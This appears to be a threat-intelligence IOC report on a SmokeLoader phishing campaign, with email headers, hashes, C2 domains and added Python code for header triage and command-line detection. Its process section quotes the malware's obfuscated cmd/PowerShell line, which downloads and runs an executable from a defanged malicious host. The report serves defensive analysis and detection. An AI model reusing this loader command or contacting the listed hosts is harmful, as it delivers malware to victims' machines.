VRad

#smokeloader_040523

May 5th, 2023 (edited)
#IOC #OptiData #VR #smokeloader #ZIP #JS

https://pastebin.com/RDVXCe0J

previous_contact:
https://pastebin.com/QpG70u8T
https://pastebin.com/BJzcXqkK
https://pastebin.com/kBW7nkZ5
https://pastebin.com/Z7zq0YkW
https://pastebin.com/b8PkhMyN
https://pastebin.com/hkskwKvc
https://pastebin.com/JmthzrL4
https://pastebin.com/1scwT0f8
https://pastebin.com/MP3kCSSh

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
https://research.checkpoint.com/2019-resurgence-of-smokeloader/

attack_vector
--------------
email attachment .zip (?) > .js > WScript.exe (WSH) > cmd.exe > PowerShell (Net.WebClient.DownloadFile) > GET 1 URL > exe (SmokeLoader)


# # # # # # # #
email_headers
# # # # # # # #
Return-Path: <prvs=14880d1fa8=inbox6@dl.kr-admin.gov.ua>
Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
Reply-To: stroybuts@ukr.net
From: inbox6@dl.kr-admin.gov.ua
Subject: рахунок від 02.05.2023   [Ukrainian: "invoice dated 02.05.2023"]
Message-Id: <7D5F7EBF-2F2B-D454-AC28-B86320169DD9@dl.kr-admin.gov.ua>
Date: Thu, 4 May 2023 07:23:20 +0300
X-Mailer: iPad Mail (13E238)
X-Authenticated-Sender: inbox6@dl.kr-admin.gov.ua

note: Reply-To points to a ukr.net mailbox outside the sending domain, while X-Authenticated-Sender equals From and the Return-Path carries a BATV prvs= tag around the same address, i.e. the message left the organization's own MDaemon server over an authenticated session rather than being spoofed from outside.

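Header triage for the block above, as an added example that is not part of the original paste. It retypes the published headers as constructed input (Subject translated to English; body and MIME parts were never published) and checks three things a responder wants from them: whether Reply-To leaves the sending organization, whether Return-Path is a BATV prvs= tag around the From address (bounce-signed by the sending MTA), and whether X-Authenticated-Sender equals From, which on MDaemon indicates an authenticated submission rather than outside spoofing. The organization match is a deliberately naive suffix comparison, an assumption that is good enough for a first pass but not a public-suffix lookup.

```python
"""Triage of the e-mail headers quoted in this report.
Input is constructed: the header lines from the paste, retyped, Subject translated."""
import re
from email import message_from_string
from email.utils import parseaddr

SAMPLE_HEADERS = """\
Return-Path: <prvs=14880d1fa8=inbox6@dl.kr-admin.gov.ua>
Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
Reply-To: stroybuts@ukr.net
From: inbox6@dl.kr-admin.gov.ua
Subject: invoice dated 02.05.2023
Message-Id: <7D5F7EBF-2F2B-D454-AC28-B86320169DD9@dl.kr-admin.gov.ua>
Date: Thu, 4 May 2023 07:23:20 +0300
X-Mailer: iPad Mail (13E238)
X-Authenticated-Sender: inbox6@dl.kr-admin.gov.ua

"""

# BATV bounce-address tag: prvs=<tag>=<original address>
BATV_RE = re.compile(r"^prvs=[0-9a-f]+=(?P<inner>.+)$", re.I)
# Bracketed IPv4 literal inside a Received: header
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def address_of(value):
    """Bare, lower-cased address from a From/Reply-To/Return-Path value."""
    return parseaddr(value or "")[1].lower()


def domain_of(value):
    addr = address_of(value)
    return addr.rsplit("@", 1)[1] if "@" in addr else ""


def same_org(a, b):
    """Naive org match (assumption): equal, or one is a sub-domain of the other."""
    return bool(a) and bool(b) and (a == b or a.endswith("." + b) or b.endswith("." + a))


def triage(raw):
    msg = message_from_string(raw)
    from_addr = address_of(msg.get("From"))
    from_dom, reply_dom = domain_of(msg.get("From")), domain_of(msg.get("Reply-To"))
    batv = BATV_RE.match(address_of(msg.get("Return-Path")))
    batv_inner = batv.group("inner") if batv else None
    auth_sender = (msg.get("X-Authenticated-Sender") or "").strip().lower()
    # Received: headers in on-the-wire order (last hop first); collect hop IPs for pivoting.
    ips = [m.group(1) for m in (IP_RE.search(h) for h in msg.get_all("Received", [])) if m]

    findings = []
    if reply_dom and not same_org(reply_dom, from_dom):
        findings.append(f"Reply-To domain {reply_dom} is outside From domain {from_dom}: replies leave the sending org")
    if batv_inner == from_addr:
        findings.append("Return-Path is a BATV prvs= tag around the From address: bounce-signed by the sending org's MTA")
    if auth_sender and auth_sender == from_addr:
        findings.append("X-Authenticated-Sender equals From: submitted over an authenticated session, not spoofed from outside")
    return {
        "from_domain": from_dom,
        "reply_to_domain": reply_dom,
        "batv_inner": batv_inner,
        "authenticated_sender": auth_sender,
        "received_ips": ips,
        "findings": findings,
    }


if __name__ == "__main__":
    for line in triage(SAMPLE_HEADERS)["findings"]:
        print("-", line)
```

The three findings together point at a mailbox that was used with its own credentials, so blocking on the sending domain would hit legitimate mail from the same organization; the ukr.net Reply-To is the more useful pivot.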

# # # # # # # #
files
# # # # # # # #
SHA-256 352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd
File name pax_2023_AB1058.zip [ Zip archive data, at least v2.0 to extract ]
File size 955.61 KB (978548 bytes)

SHA-256 3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25
File name pax_2023_AB1058.pdf [ PDF document, version 1.7 ]
File size 1.13 MB (1180511 bytes)

SHA-256 f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
File name pax_2023_AB1058..js [ JavaScript ]   (double dot in the name is as found in the sample, see proc below)
File size 28.29 KB (28967 bytes)

SHA-256 cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae
File name portable.exe (TempgEq94.exe) [ PE32 executable for MS Windows ]   (portable.exe on the server, saved locally as TempgEq94.exe)
File size 263.50 KB (269824 bytes)


# # # # # # # #
activity
# # # # # # # #

PL_SCR http://homospoison{ .ru/one/portable.exe [193.106.175.177]


C2

http://coudzoom{ .ru/
http://balkimotion{ .ru/
http://ligaspace{ .ru/
http://ipodromlan{ .ru/
http://redport80{ .ru/
http://superboler{ .com/
http://lamazone{ .site/
http://criticalosl{ .tech/
http://3dstore{ .pro/
http://humanitarydp{ .ug/
http://shopersport{ .ru/
http://sindoproperty{ .org/
http://maximprofile{ .net/
http://zaliphone{ .com/



netwrk
--------------
193.106.175.177 homospoison.ru 80 HTTP GET /one/portable.exe HTTP/1.1 Google Chrome

note: the User-Agent is the literal string "Google Chrome" set by the downloader script, not a browser UA (no Mozilla/5.0 prefix); a plain HTTP GET for an .exe with that UA is a cheap proxy-log detection.


comp
--------------
powershell.exe 193.106.175.177 homospoison.ru


proc
--------------
"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"
"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');
C:\Users\support\AppData\Local\TempgEq94.exe

note: the DownloadFile target is written as '%temp%gEq94.exe' with no backslash after %temp%, so cmd.exe expands it to ...\AppData\Local\TempgEq94.exe, a file beside the Temp folder rather than inside it (matches the third proc line and the drop path below). The ^ in pO^wErshEll is a cmd.exe escape character that is removed before the command runs, and 'Net.We' + 'bClient' is a split string for Net.WebClient; both exist only to defeat naive command-line matching. The trailing "& ZJHYOcunksxSdyp" is junk that cmd.exe fails to resolve after the payload has started.


persist
--------------
n/a


drop
--------------
C:\Users\%username%\AppData\Local\TempgEq94.exe

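Detection logic for the proc lines above, as an added example that is not part of the original paste. It takes constructed process-creation events (the three command lines from this report, defanged exactly as published, plus one benign PowerShell invocation), undoes the cmd.exe caret escape, re-joins the split 'Net.We'+'bClient' literal, expands %temp% the way cmd.exe does (no separator, which is why the drop lands in ...\AppData\Local\TempgEq94.exe), extracts the download URL and scores each event. The rule names, the event tuples and the temp directory C:\Users\support\AppData\Local\Temp are assumptions chosen to match the paths in this report; the "{ ." defang convention is the one this paste uses.

```python
"""Normalize and score the process command lines from this report.
EVENTS is constructed from the paste's proc section plus one benign line."""
import re

DEFANG = [("{ .", "."), ("hxxp", "http")]          # defang conventions to undo
URL_RE = re.compile(r"""https?://[^\s'"<>]+""", re.I)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;?")   # $name='literal';
DROP_RE = re.compile(r"downloadfile\('[^']*',\s*'([^']*)'\)", re.I)
UA_RE = re.compile(r"headers\['user-agent'\]\s*=\s*'([^']*)'")
WSH_RE = re.compile(r"\\users\\.*\.(js|jse|vbs|vbe|wsf)\"?$")


def refang(s):
    for a, b in DEFANG:
        s = s.replace(a, b)
    return s


def strip_carets(s):
    # cmd.exe uses ^ to escape the next character, so pO^wErshEll reaches the
    # PowerShell parser as pOwErshEll (and ^^ becomes a literal ^).
    return re.sub(r"\^(.)", r"\1", s)


def resolve_literals(ps):
    # Collect $name='literal' assignments, drop them, then substitute the
    # literals for the references: New-Object $v1$v2 -> New-Object Net.WebClient.
    literals = dict(ASSIGN_RE.findall(ps))
    body = ASSIGN_RE.sub("", ps)
    return re.sub(r"\$(\w+)", lambda m: literals.get(m.group(1), m.group(0)), body)


def expand_temp(path, temp_dir=r"C:\Users\support\AppData\Local\Temp"):
    # cmd.exe substitutes %temp% textually; '%temp%gEq94.exe' therefore lands
    # next to the Temp folder, not inside it. temp_dir is an assumed value.
    return re.sub(r"%temp%", lambda _: temp_dir, path, flags=re.I)


def detect(image, cmdline):
    raw = refang(cmdline)
    norm = strip_carets(raw)
    ps = resolve_literals(norm)
    low = ps.lower()
    img = image.lower().rsplit("\\", 1)[-1]
    hits = []
    if img == "wscript.exe" and WSH_RE.search(low):
        hits.append("wsh_script_from_user_profile")
    if img == "cmd.exe" and "powershell" in low:
        hits.append("powershell_spawned_via_cmd")
    if re.search(r"\w\^\w", raw):
        hits.append("caret_obfuscation")
    flags = ("-executionpolicy bypass", "-noprofile", "-w hidden", "-windowstyle hidden")
    if sum(f in low for f in flags) >= 2:
        hits.append("hidden_bypass_noprofile")
    if "new-object net.webclient" in low and "net.webclient" not in norm.lower():
        hits.append("split_string_new_object")     # only true after re-joining literals
    if ".downloadfile(" in low:
        hits.append("webclient_downloadfile")
    ua = UA_RE.search(low)
    if ua and not ua.group(1).startswith("mozilla/"):
        hits.append("non_browser_user_agent")       # "Google Chrome" is not a real UA
    drop = DROP_RE.search(ps)
    return {
        "hits": hits,
        "urls": URL_RE.findall(ps),
        "drop_path": expand_temp(drop.group(1)) if drop else None,
    }


# Constructed events: (image, command line) from the proc section, plus one benign line.
EVENTS = [
    (r"C:\Windows\System32\WScript.exe",
     r'''"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"'''),
    (r"C:\Windows\System32\cmd.exe",
     r'''"C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');'''),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'''),
]


def run_all(events=EVENTS):
    return [detect(image, cmd) for image, cmd in events]


if __name__ == "__main__":
    for (image, _), result in zip(EVENTS, run_all()):
        print(image.rsplit("\\", 1)[-1], result)
```

Matching on the normalized command line is what makes the cmd.exe and powershell.exe events score the same on the split string and the fake User-Agent; a rule that looks for the literal "Net.WebClient" in the raw command line misses both.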

# # # # # # # #
additional info
# # # # # # # #


TTPs: Query Registry / System Information Discovery
wscript.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
(read by the JS stage under wscript.exe; Geo\Nation holds the user's country setting)

TTPs: Email Collection
explorer.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
(Outlook profile reads are attributed to explorer.exe; SmokeLoader injects its payload into explorer.exe, see the Check Point write-up in FAQ, so the injected stage and explorer's own activity share this process name in sandbox telemetry)


# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd/details
https://www.virustotal.com/gui/file/3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25/details
https://www.virustotal.com/gui/file/f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea/details
https://www.virustotal.com/gui/file/cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae/details
https://analyze.intezer.com/analyses/27e7086e-09d8-4998-9e25-06c41e34a42d

VR